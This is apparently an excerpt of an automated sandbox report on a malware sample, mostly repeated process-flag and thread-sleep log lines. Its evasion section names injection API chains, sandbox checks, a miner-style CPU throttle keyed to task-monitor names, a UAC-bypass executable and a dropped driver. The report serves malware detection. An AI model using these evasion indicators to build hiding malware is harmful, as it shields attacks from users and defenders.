Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (identical entry reported 99 times)

Malware Analysis System Evasion

Source: C:\Windows\System32\dllhost.exe Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, 94_2_0000000140001868
Source: C:\Windows\System32\dllhost.exe Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, 95_2_0000000140001868
Source: C:\Windows\System32\dllhost.exe Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, 97_2_0000000140001868
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive (identical entry reported 3 times)
Source: C:\Windows\System32\svchost.exe System information queried: FirmwareTableInformation
Source: C:\Windows\explorer.exe System information queried: FirmwareTableInformation
Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [0M%S STOPPING IDLE, SETTING MAX CPU TO: %D%S STARTING IDLE, SETTING MAX CPU TO: %DTASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE%S
Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Memory allocated: 1140000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Memory allocated: 1B260000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\conhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6336
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3481
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2757
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7107
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2089
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8131
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1347
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8472
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 469
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8845
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 561
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8877
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 498
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8547
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1003
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5442
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6183
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1570
Source: C:\Windows\System32\conhost.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess
Source: C:\Windows\System32\dllhost.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\e7WMhx18XN.exe TID: 7836 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 5808 Thread sleep count: 144 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7064 Thread sleep count: 6336 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7064 Thread sleep count: 3481 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3408 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3952 Thread sleep count: 2757 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2712 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3964 Thread sleep count: 175 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5256 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5084 Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7348 Thread sleep count: 8131 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7384 Thread sleep count: 1347 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1008 Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7472 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7376 Thread sleep count: 8472 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7376 Thread sleep count: 469 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1100 Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6200 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456 Thread sleep count: 8845 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2956 Thread sleep count: 561 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4484 Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4100 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476 Thread sleep count: 8877 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524 Thread sleep count: 498 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5172 Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3504 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6392 Thread sleep count: 8547 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2900 Thread sleep count: 1003 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1992 Thread sleep count: 35 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3600 Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3152 Thread sleep count: 5442 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1184 Thread sleep count: 107 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5500 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6220 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 504 Thread sleep count: 6183 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 504 Thread sleep count: 1570 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1384 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7304 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1232 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 6412 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 4948 Thread sleep count: 158 > 30
Source: C:\Windows\System32\dllhost.exe TID: 3976 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 3520 Thread sleep count: 251 > 30
Source: C:\Windows\System32\lsass.exe TID: 2780 Thread sleep count: 43 > 30
Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
